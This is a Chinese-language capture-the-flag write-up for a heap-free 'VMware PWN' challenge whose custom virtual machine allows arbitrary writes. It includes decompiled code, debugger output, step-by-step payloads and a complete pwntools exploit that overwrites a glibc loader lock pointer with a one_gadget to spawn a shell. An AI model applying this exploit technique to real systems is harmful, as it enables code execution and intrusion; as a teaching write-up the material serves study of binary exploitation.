記一道有趣的VMware PWN
VSole2021-09-10 18:30:20
題目亮點在于無需泄露libc地址,操控程序內部計算即可進行精準覆蓋。
題目信息
題目附件:pwn、libc-2.27.so
radish ? nice checksec pwn[*] '/root/nice/pwn' Arch: amd64-64-little RELRO: Full RELRO Stack: No canary found NX: NX enabled PIE: PIE enabledradish ? nice strings pwn | grep "GCC"GCC: (Ubuntu 7.5.0-3ubuntu1~18.04) 7.5.0radish ? nice ./libc-2.27.so GNU C Library (Ubuntu GLIBC 2.27-3ubuntu1.4) stable release version 2.27.Copyright (C) 2018 Free Software Foundation, Inc.This is free software; see the source for copying conditions.There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR APARTICULAR PURPOSE.Compiled by GNU CC version 7.5.0.libc ABIs: UNIQUE IFUNCFor bug reporting instructions, please see:://bugs.launchpad.net/ubuntu/+source/glibc/+bugs>.
程序分析
main函數邏輯很簡單,先是在bss段上讀入一個字符串,然后調用了execve函數
execve函數中實現了一套虛擬指令,提供的功能有加減乘除的賦值運算,并沒有其他輸出輸入的操作
v1 = 0LL; do { while ( 1 ) { while ( 1 ) { while ( 1 ) { while ( 1 ) { while ( 1 ) { while ( 1 ) { v29 = *(&unk_202060 + v1++ + 512); result = v29; if ( v29 != 6 ) break; v15 = *(&unk_202060 + v1 + 512); v6 = v1 + 1; v24 = *(&unk_202060 + v6 + 512); v1 = v6 + 1; *(&unk_202060 + v15) *= v24; } if ( v29 > 6 ) break; if ( v29 == 3 ) { v13 = *(&unk_202060 + v1 + 512); v4 = v1 + 1; v22 = *(&unk_202060 + v4 + 512); v1 = v4 + 1; *(&unk_202060 + v13) -= v22; } else if ( v29 > 3 ) { v14 = *(&unk_202060 + v1 + 512); v5 = v1 + 1; v23 = *(&unk_202060 + v5 + 512); v1 = v5 + 1; if ( v29 == 4 ) *(&unk_202060 + v14) += *(&unk_202060 + v23); else *(&unk_202060 + v14) -= *(&unk_202060 + v23); } else if ( v29 == 1 ) { v11 = *(&unk_202060 + v1 + 512); v2 = v1 + 1; v20 = *(&unk_202060 + v2 + 512); v1 = v2 + 1; *(&unk_202060 + v11) = v20; } else if ( v29 == 2 ) { v12 = *(&unk_202060 + v1 + 512); v3 = v1 + 1; v21 = *(&unk_202060 + v3 + 512); v1 = v3 + 1; *(&unk_202060 + v12) += v21; } } if ( v29 != 9 ) break; v17 = *(&unk_202060 + v1 + 512); v8 = v1 + 1; v26 = *(&unk_202060 + v8 + 512); v1 = v8 + 1; *(&unk_202060 + *(&unk_202060 + v17)) -= *(&unk_202060 + v26); } if ( v29 > 9 ) break; v16 = *(&unk_202060 + v1 + 512); v7 = v1 + 1; v25 = *(&unk_202060 + v7 + 512); v1 = v7 + 1; if ( v29 == 7 ) *(&unk_202060 + v16) /= v25; else *(&unk_202060 + *(&unk_202060 + v16)) += *(&unk_202060 + v25); } if ( v29 != 11 ) break; v19 = *(&unk_202060 + v1 + 512); v10 = v1 + 1; v28 = *(&unk_202060 + v10 + 512); v1 = v10 + 1; *(&unk_202060 + v19) -= *(&unk_202060 + *(&unk_202060 + v28)); } if ( v29 >= 11 ) break; v18 = *(&unk_202060 + v1 + 512); v9 = v1 + 1; v27 = *(&unk_202060 + v9 + 512); v1 = v9 + 1; *(&unk_202060 + v18) += *(&unk_202060 + *(&unk_202060 + v27)); } } while ( v29 != 0xFF ); return result;}
解題思路
我并沒有想到有什么辦法可以泄露libc地址,但是可以通過任意地址寫,而寫的值也是可以通過.bss段上的數據計算得出。我的思路就是劫持__rtld_lock_unlock_recursive
當程序正常退出時,會調用這里的代碼。指向此地址的指針(以下稱之為指著P)在/lib/x86_64-linux-gnu/ld-2.27.so地址空間中。原理可查看源碼glibc/elf/dl-fini.c
通過以下方式找到該指針
pwndbg> vmmapLEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA 0x555555554000 0x555555556000 r-xp 2000 0 /root/nice/pwn 0x555555755000 0x555555756000 r--p 1000 1000 /root/nice/pwn 0x555555756000 0x555555757000 rw-p 1000 2000 /root/nice/pwn 0x555555757000 0x55555575a000 rw-p 3000 0 [heap] 0x7ffff79e4000 0x7ffff7bcb000 r-xp 1e7000 0 /lib/x86_64-linux-gnu/libc-2.27.so 0x7ffff7bcb000 0x7ffff7dcb000 ---p 200000 1e7000 /lib/x86_64-linux-gnu/libc-2.27.so 0x7ffff7dcb000 0x7ffff7dcf000 r--p 4000 1e7000 /lib/x86_64-linux-gnu/libc-2.27.so 0x7ffff7dcf000 0x7ffff7dd1000 rw-p 2000 1eb000 /lib/x86_64-linux-gnu/libc-2.27.so 0x7ffff7dd1000 0x7ffff7dd5000 rw-p 4000 0 0x7ffff7dd5000 0x7ffff7dfc000 r-xp 27000 0 /lib/x86_64-linux-gnu/ld-2.27.so 0x7ffff7fdf000 0x7ffff7fe1000 rw-p 2000 0 0x7ffff7ff8000 0x7ffff7ffb000 r--p 3000 0 [vvar] 0x7ffff7ffb000 0x7ffff7ffc000 r-xp 1000 0 [vdso] 0x7ffff7ffc000 0x7ffff7ffd000 r--p 1000 27000 /lib/x86_64-linux-gnu/ld-2.27.so 0x7ffff7ffd000 0x7ffff7ffe000 rw-p 1000 28000 /lib/x86_64-linux-gnu/ld-2.27.so 0x7ffff7ffe000 0x7ffff7fff000 rw-p 1000 0 0x7ffffffde000 0x7ffffffff000 rw-p 21000 0 [stack]0xffffffffff600000 0xffffffffff601000 --xp 1000 0 [vsyscall]pwndbg> p rtld_lock_default_unlock_recursive$1 = {void (void *)} 0x7ffff7dd60f0 pwndbg> search -p 0x7ffff7dd60f0warning: Unable to access 16000 bytes of target memory at 0x7ffff7bd2d07, halting search.ld-2.27.so 0x7ffff7ffdf68 0x7ffff7dd60f0pwndbg>
修改該指針的思路:
1、修改bss段上stderr的地址為libc基地址,payload = p64(3)+p64(0x10000000000000000-4)+p64(0x3ec680)
2、將指針P的值與One_gadget的偏移填充到0x202060處,供之后劫持指針使用
3、把原stderr地址出修改成0x202008到指針P的偏移加上libc地址。payload += p64(2)+p64(0x10000000000000000-4)+p64(0x619000+3944-88)
為什么要選擇0x202008?因為之后修改指針P的值是利用虛擬指令9的功能,之前的操作無法得到地址0x202060到指針P的距離,所以我們只能通過先減去一個程序的地址,然后再加上0x202060和它們之間的填充(也許是負數),就可以通過虛擬指令9的功能進行劫持。
4、繼步驟三操作,減去程序的某個地址,這里選用0x202008,因為它在stderr上方附近,便于操作。payload += p64(5)+p64(0x10000000000000000-4)+p64(0x10000000000000000-11)
5、將步驟3的值除8,因為虛擬指令9是通過int64指針進行復制的,所以我們需要計算出Index(類似于數組)。payload += p64(7)+p64(0x10000000000000000-4)+p64(8)
6、進行指針修改并結束程序。payload += p64(9)+p64(0x10000000000000000-4)+p64(0)+p64(0xff)
exp
#coding:utf-8from pwn import *# from LibcSearcher import *#author:蘿卜啊啊啊啊啊啊啊context.log_level='debug'debug = 1file_name = './pwn'libc_name = '/lib/x86_64-linux-gnu/libc.so.6'ip = ''prot = ''if debug: r = process(file_name) libc = ELF(libc_name)else: r = remote(ip,int(prot)) libc = ELF(libc_name)
def debug(): gdb.attach(r) raw_input()
file = ELF(file_name)sl = lambda x : r.sendline(x)sd = lambda x : r.send(x)sla = lambda x,y : r.sendlineafter(x,y)rud = lambda x : r.recvuntil(x,drop=True)ru = lambda x : r.recvuntil(x)li = lambda name,x : log.info(name+':'+hex(x))ri = lambda : r.interactive()# debug()payload = p64(3)+p64(0x10000000000000000-4)+p64(0x3ec680)payload += p64(1)+p64(0)+p64(3812747-93)payload += p64(2)+p64(0x10000000000000000-4)+p64(0x619000+3944-88)#targtepayload += p64(5)+p64(0x10000000000000000-4)+p64(0x10000000000000000-11)payload += p64(7)+p64(0x10000000000000000-4)+p64(8)payload += p64(9)+p64(0x10000000000000000-4)+p64(0)payload += p64(0xff)sl(payload)ri()'''0x4f365 execve("/bin/sh", rsp+0x40, environ)constraints: rsp & 0xf == 0 rcx == NULL
0x4f3c2 execve("/bin/sh", rsp+0x40, environ)constraints: [rsp+0x40] == NULL
0x10a45c execve("/bin/sh", rsp+0x70, environ)constraints: [rsp+0x70] == NULL
'''
感覺還有一種解法,就是劫持ret地址,但是沒找到合適的棧指針。
Reference
https://www.anquanke.com/post/id/199832
VSole
網絡安全專家